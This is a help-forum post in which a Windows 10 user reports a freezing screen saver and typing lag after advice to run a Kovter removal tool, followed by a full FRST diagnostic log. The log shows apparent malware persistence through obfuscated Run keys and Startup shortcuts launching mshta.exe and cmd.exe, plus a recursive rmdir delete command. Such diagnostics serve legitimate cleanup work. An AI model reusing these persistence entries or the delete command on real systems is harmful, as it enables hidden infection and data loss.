For a couple of months, I have noticed, my screen saver which is a message is supposed to bounce but it will freeze up. My screen saver setting is set to kick in at 1 minute by the way. Several times throughout the day, I will notice my screen saver is NOT bouncing but frozen. After several seconds, it will move but freeze again.
I move the mouse to remove the screen saver but nothing happens. I continually shake the mouse for at least 30 seconds and nothing. I have had to resort to hitting control/alt/delete and the screen saver will disappear and I hit cancel and all things seem normal as far as the screen saver goes.
I have also noticed a lag when typing. I can type rather quickly but the words do not appear as quickly as they should; perhaps, a half second or less in lag time.
G2G advised me to run the program Kovter removal tool. I did as advised. It ran just fine and disappeared when it finished. It flashed something on the screen but it was off in an instant so I have no idea what it said.
G2G also asked me to check my CPU usage and I have two register server processes running and taking up a lot of CPU.
64 Bit OS
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 08-01-2017
Ran by Dorraine (administrator) on DORRAINE-PC (11-01-2017 01:56:56)
Running from C:\Users\Dorraine\Downloads
Loaded Profiles: Dorraine & DefaultAppPool (Available Profiles: Dorraine & DefaultAppPool)
Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Piriform Ltd) C:\Program Files\Defraggler\Defraggler64.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\w3wp.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_24_0_0_186.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_24_0_0_186.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Corporation) C:\Windows\HelpPane.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-26] (Microsoft Corporation)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [25779624 2016-12-21] (Dropbox, Inc.)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2001920 2014-04-04] (AimerSoft)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7943072 2016-08-06] (SUPERAntiSpyware)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [Spotify Web Helper] => C:\Users\Dorraine\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1525360 2016-05-15] (Spotify Ltd)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*ysrtifhuy<*>] => "C:\Users\Dorraine\AppData\Local\360fd\41727.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*iznt<*>] => "C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\RunOnce: [Uninstall C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64"
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\ssText3d.scr [231936 2016-07-16] (Microsoft Corporation)
HKU\S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2016-07-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2016-06-04]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\14d3a.lnk [2017-01-10]
ShortcutTarget: 14d3a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2a0f0a9d.lnk [2017-01-11]
ShortcutTarget: 2a0f0a9d.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8a6b2.lnk [2016-09-26]
ShortcutTarget: 8a6b2.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f943f.lnk [2016-10-11]
ShortcutTarget: f943f.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{b9a91879-cca5-4abf-b5c9-de12170b6992}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl
FireFox:
========
FF ProfilePath: C:\Users\Dorraine\AppData\Roaming\Mozilla\Firefox\Profiles\a5d36r4c.default-1474997185436 [2017-01-11]
FF Homepage: Mozilla\Firefox\Profiles\a5d36r4c.default-1474997185436 -> hxxp://my.xfinity.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-09-30] (Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default [2016-09-27]
CHR Extension: (Google Slides) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-09-29]
CHR Extension: (Google Docs) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-09-29]
CHR Extension: (Google Drive) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-27]
CHR Extension: (YouTube) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-29]
CHR Extension: (Google Search) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-09-29]
CHR Extension: (Google Sheets) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-09-29]
CHR Extension: (Google Docs Offline) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-09-27]
CHR Extension: (Gmail) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-09-29]
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [42096 2016-12-21] (Dropbox, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [7032080 2016-05-12] (TeamViewer GmbH)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.1.6.0\WsAppService.exe [388608 2016-01-28] (Wondershare) [File not signed]
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 avgntflt; C:\Windows\SysWOW64\DRIVERS\avgntflt.sys [144664 2016-08-18] (Avira Operations GmbH & Co. KG)
S1 avipbb; C:\Windows\SysWOW64\DRIVERS\avipbb.sys [154392 2016-08-18] (Avira Operations GmbH & Co. KG)
S1 avkmgr; C:\Windows\SysWOW64\DRIVERS\avkmgr.sys [35488 2016-08-18] (Avira Operations GmbH & Co. KG)
R3 dot4; C:\WINDOWS\system32\DRIVERS\Dot4.sys [151968 2012-09-25] (Windows ® Win 7 DDK provider)
R3 Dot4Print; C:\WINDOWS\System32\drivers\Dot4Prt.sys [27040 2012-09-25] (Windows ® Win 7 DDK provider)
S3 k57nd; C:\WINDOWS\System32\DRIVERS\k57amd64.sys [356392 2011-10-25] (Broadcom Corporation)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S3 WsAudioDevice_383S(1); C:\WINDOWS\System32\drivers\WsAudioDevice_383S(1).sys [29288 2015-07-30] (Wondershare)
S3 dbx; system32\DRIVERS\dbx.sys [X]
U3 idsvc; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-01-11 01:56 - 2017-01-11 01:58 - 00015534 _____ C:\Users\Dorraine\Downloads\FRST.txt
2017-01-11 01:55 - 2017-01-11 01:56 - 00001015 _____ C:\Users\Dorraine\Desktop\FRST64 - Shortcut.lnk
2017-01-11 01:52 - 2017-01-11 01:56 - 00000000 ____D C:\FRST
2017-01-11 01:51 - 2017-01-11 01:52 - 02419200 _____ (Farbar) C:\Users\Dorraine\Downloads\FRST64.exe
2017-01-10 23:49 - 2017-01-10 23:49 - 02744744 _____ (Symantec Corporation) C:\Users\Dorraine\Downloads\FixTool64(2).exe
2017-01-10 23:46 - 2017-01-10 23:50 - 02744744 _____ (Symantec Corporation) C:\Users\Dorraine\Downloads\FixTool64(1).exe
2017-01-10 23:45 - 2017-01-10 23:46 - 02744744 _____ (Symantec Corporation) C:\Users\Dorraine\Downloads\FixTool64.exe
2016-12-31 19:46 - 2016-12-31 19:46 - 26557621 _____ C:\Users\Dorraine\Documents\MVI_3884_x264.mp4
2016-12-31 19:38 - 2016-12-31 19:46 - 26557621 _____ C:\Users\Dorraine\Downloads\MVI_3884_x264.mp4
2016-12-31 19:33 - 2016-12-24 23:26 - 1440503384 _____ C:\Users\Dorraine\Documents\MVI_3884.MOV
2016-12-31 19:30 - 2016-12-31 18:33 - 12477637 _____ C:\Users\Dorraine\Documents\MVI_3886_x264.mp4
2016-12-31 19:30 - 2016-12-31 18:26 - 18908883 _____ C:\Users\Dorraine\Documents\MVI_3883_x264.mp4
2016-12-31 19:30 - 2016-12-31 18:19 - 14543355 _____ C:\Users\Dorraine\Documents\MVI_3885_x264.mp4
2016-12-31 19:30 - 2016-12-31 17:57 - 23483944 _____ C:\Users\Dorraine\Documents\MVI_3888_x264.mp4
2016-12-31 19:30 - 2016-12-31 17:47 - 15521466 _____ C:\Users\Dorraine\Documents\MVI_3887_x264.mp4
2016-12-31 17:35 - 2016-12-31 17:36 - 00000000 ____D C:\Users\Dorraine\AppData\Roaming\Anvsoft
2016-12-31 17:35 - 2016-12-31 17:35 - 00001272 _____ C:\Users\Dorraine\Desktop\Any Video Converter.lnk
2016-12-31 17:35 - 2016-12-31 17:35 - 00000000 ____D C:\Users\Dorraine\Documents\Any Video Converter
2016-12-31 17:33 - 2016-12-31 17:33 - 00000000 ____D C:\Program Files (x86)\Anvsoft
2016-12-31 17:29 - 2016-12-31 17:30 - 51282968 _____ C:\Users\Dorraine\Downloads\avc-free.exe
2016-12-21 22:22 - 2016-12-21 22:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-12-21 13:15 - 2016-12-21 13:15 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2016-12-21 13:15 - 2016-12-21 13:15 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2016-12-21 13:15 - 2016-12-21 13:15 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2016-12-21 13:15 - 2016-12-21 13:15 - 00042096 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2016-12-16 15:55 - 2016-12-16 15:56 - 00000000 ____D C:\Users\Dorraine\AppData\Local\0bdc3b3d63
2016-12-16 15:23 - 2016-12-16 15:23 - 00000000 ____D C:\Users\Dorraine\AppData\Local\7df78865
2016-12-13 23:21 - 2016-12-09 05:01 - 01503544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2016-12-13 23:21 - 2016-12-09 05:01 - 00861024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2016-12-13 23:21 - 2016-12-09 04:57 - 06668040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-12-13 23:21 - 2016-12-09 04:52 - 01435896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2016-12-13 23:21 - 2016-12-09 04:40 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2016-12-13 23:21 - 2016-12-09 04:34 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-12-13 23:21 - 2016-12-09 04:32 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2016-12-13 23:21 - 2016-12-09 04:30 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-12-13 23:21 - 2016-12-09 04:20 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-12-13 23:21 - 2016-12-09 04:18 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-12-13 23:21 - 2016-12-09 04:18 - 00165376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2016-12-13 23:21 - 2016-12-09 04:17 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2016-12-13 23:21 - 2016-12-09 04:16 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2016-12-13 23:21 - 2016-12-09 04:16 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-12-13 23:21 - 2016-11-02 05:28 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.OnlineId.dll
2016-12-13 23:20 - 2016-12-09 05:11 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-12-13 23:20 - 2016-12-09 05:01 - 02323728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2016-12-13 23:20 - 2016-12-09 04:59 - 02166752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-12-13 23:20 - 2016-12-09 04:59 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-12-13 23:20 - 2016-12-09 04:57 - 01852720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-12-13 23:20 - 2016-12-09 04:56 - 00959112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-12-13 23:20 - 2016-12-09 04:52 - 01415752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2016-12-13 23:20 - 2016-12-09 04:51 - 00117240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
2016-12-13 23:20 - 2016-12-09 04:41 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WordBreakers.dll
2016-12-13 23:20 - 2016-12-09 04:34 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2016-12-13 23:20 - 2016-12-09 04:31 - 03689984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-12-13 23:20 - 2016-12-09 04:31 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2016-12-13 23:20 - 2016-12-09 04:30 - 19413504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-12-13 23:20 - 2016-12-09 04:28 - 03306496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-12-13 23:20 - 2016-12-09 04:27 - 19417088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-12-13 23:20 - 2016-12-09 04:23 - 12177920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-12-13 23:20 - 2016-12-09 04:20 - 03198464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2016-12-13 23:20 - 2016-12-09 04:18 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-12-13 23:20 - 2016-12-09 04:16 - 00353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-12-13 23:20 - 2016-12-09 04:15 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-12-13 23:20 - 2016-12-09 04:15 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-12-13 23:20 - 2016-12-09 04:15 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EditBufferTestHook.dll
2016-12-13 23:19 - 2016-12-09 05:00 - 00106896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcrypt.dll
2016-12-13 23:19 - 2016-12-09 04:36 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2016-12-13 23:19 - 2016-12-09 04:31 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-12-13 23:19 - 2016-12-09 04:17 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2016-12-13 23:19 - 2016-12-09 03:54 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2016-12-13 22:59 - 2016-12-09 05:20 - 01738560 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2016-12-13 22:59 - 2016-12-09 05:19 - 01293152 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-12-13 22:59 - 2016-12-09 05:15 - 08168000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-12-13 22:59 - 2016-12-09 05:10 - 01461200 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2016-12-13 22:59 - 2016-12-09 04:45 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-12-13 22:59 - 2016-12-09 04:37 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-12-13 22:59 - 2016-12-09 04:22 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-12-13 22:59 - 2016-12-09 04:21 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-12-13 22:59 - 2016-12-09 04:21 - 01512960 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-12-13 22:59 - 2016-12-09 04:20 - 00730624 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-12-13 22:59 - 2016-12-09 04:19 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2016-12-13 22:59 - 2016-09-15 11:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-12-13 22:58 - 2016-12-09 05:32 - 07816032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-12-13 22:58 - 2016-12-09 05:27 - 00172528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2016-12-13 22:58 - 2016-12-09 05:20 - 02189664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
